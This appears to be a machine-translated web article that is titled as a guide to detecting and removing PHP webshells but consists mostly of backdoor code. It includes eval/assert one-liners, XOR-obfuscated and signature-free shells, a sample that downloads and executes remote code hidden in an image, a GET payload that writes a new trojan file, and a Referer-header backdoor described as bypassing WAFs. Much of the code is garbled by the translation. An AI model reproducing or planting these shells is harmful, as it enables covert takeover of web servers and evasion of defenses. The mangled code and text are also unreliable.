How to identify and eliminate PHP webshells and webshells

How to identify and eliminate PHP webshells and webshells

The most common backdoor may be written like this.

<?php @eval($_POST['cmd']);?>

Or

<?php @assert($_POST['cmd']);?>

Tudouya provides [A Construction Technique] On FREEBUF.

Copy codeThe Code is as follows:
<? Php @ $ _ +; // $ _ = 1 $ __= ("#" ^ "|"); // $ __= _ $ __. = (". "^ "~ "); // _ P $ __. = ("/" ^ "'"); // _ PO $ __. = ("|" ^ "/"); // _ POS $ __. = ("{" ^ "/"); // _ POST $ __}[! $ _] ($ {$ __} [$ _]); // $ _ POST [0] ($ _ POST [1]);?>

Construct and generate, of course, too intuitive to write

Copy codeThe Code is as follows:
<? Php @ $ _ ++; $ __= ("#" ^ "|"). ("." ^ "~ "). ("/" ^ "'"). ("|" ^ "/"). ("{" ^ __}[! $ _] ($ {__} [$ _]);?>

Then fill in some common code for disguise. A simple "Kill-free" shell sample will appear.

Let's take a look at the simplest and easiest way to scan and kill php backdoors in history.

Directly run the Code:

<? Php $ c = urldecode ($ _ GET ['C']); if ($ c) {'$ C' ;}// complete! $ _ GET ['C'] | '{_ _ GET ['C']}'; // streamlined /************************************ * ******************* principle: the ''symbol in PHP will be executed as a system command * example: http: // host /? C = type % 20config. php> config.txt *. Then you can download config.txt to view the content! * Try a more abnormal command and do not do anything bad! **************************************** ***************/

The principle is that PHP will directly resolve the 'symbol (note: it is not a single quotation mark) to the system command for execution! In this way, we can freely expand abnormally!

Let's take a look at a simple piece of code.

<?php preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft"); ?> 

Password page

Recently, we captured a PHP-based webshell sample. Its clever code dynamic generation method and its own page camouflage method make us feel a lot of fun in the process of analyzing this sample. Next let's share this wonderful Webshell.

The Webshell code is as follows:

<?phperror_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))$_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);?>

The key is to look at the following code,

Copy codeThe Code is as follows:
Sprintf ('% s? % S', pack ("H *", 'hour'), uniqid ())

After this is executed, it is actually an image. The decrypted image address is as follows:

Http://7shell.googlecode.com/svn/make.jpg? 53280b00f1e85
Then call the file_get_contents function to read the image as a string, substr to take the content after 3649 bytes, and then call gzuncompress to decompress the code. Finally, the preg_replace modifier e is called to execute malicious code. Run the following statement to restore the malicious sample code,

Copy codeThe Code is as follows:
<? Php
Echo gzuncompress (substr (file_get_contents (sprintf ('% s? % S', pack ("H *",
'Qd'), uniqid (), 3649 ));
?>

Hide a PHP sentence without features:

   <?php session_start(); $_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); $_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' ); ?> 

Assign the content of $ _ POST ['code'] to $ _ SESSION ['thecode'] and then execute $ _ SESSION ['thecode']. The highlight is that there is no signature. If you use a scanning tool to check the code, no alarm will be triggered.
Super hidden php backdoor:

<?php $_GET [a]( $_GET [b]);?>

 
Only the GET function constitutes a Trojan;
Usage:
? A = assert & B =$ {fputs % 28 fopen % 28base64_decode % 28Yy5waHA % 29, w % 29, base64_decode % bytes % 29% 29 };

After execution, the current directory generates c. php one-sentence Trojan. When parameter a is set to eval, an error is reported. When parameter a is set to eval, an error is reported. If parameter a is set to assert, but a trojan is generated. This is a simple sentence, is extended to such applications.
Hierarchical request, code to run php backdoor:
This method is implemented using two files, file 1
 

 <?php //1.php header( 'Content-type:text/html;charset=utf-8' ); parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a ); if (reset( $a ) == '10' && count ( $a ) == 9) { eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6))))); } ?>

File 2

<? Php // 2.php header ('content-type: text/html; charset = UTF-8 '); // code to be executed $ CODE = <CODE phpinfo (); code; // perform base64 encoding $ code = base64_encode ($ code ); // construct a referer string $ referer = "a = 10 & B = AB & c = 34 & d = re & e = 32 & f = km & g = {$ code }& h = & I = "; // backdoor url $ url = 'HTTP: // localhost/test1/1.php'; $ ch = curl_init (); $ options = array (CURLOPT_URL => $ url, CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_R EFERER => $ referer); curl_setopt_array ($ ch, $ options); echocurl_exec ($ ch);?>

Use HTTP_REFERER in the HTTP request to run base64-encoded code to achieve the backdoor effect. Generally, waf requires loose or no referer detection. In this way, bypass waf is good.

We treat these PHP backdoors with a learning attitude. Many PHP backdoors let us see how painstaking the programmers are.